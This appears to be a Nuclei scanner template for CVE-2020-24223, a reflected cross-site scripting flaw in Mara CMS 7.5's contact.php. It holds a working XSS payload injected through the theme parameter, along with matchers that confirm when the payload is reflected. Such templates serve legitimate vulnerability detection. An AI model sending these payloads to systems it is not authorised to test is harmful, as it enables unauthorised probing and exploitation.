39 lines
1.1 KiB
YAML
39 lines
1.1 KiB
YAML
id: CVE-2020-24223
|
|
|
|
info:
|
|
name: Mara CMS 7.5 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48777
|
|
- https://sourceforge.net/projects/maracms/
|
|
- https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-24223
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-24223
|
|
cwe-id: CWE-79
|
|
tags: cve,cve2020,mara,xss,edb
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- '"><script>alert(document.domain)</script>'
|
|
part: body
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
# Enhanced by mp on 2022/05/04
|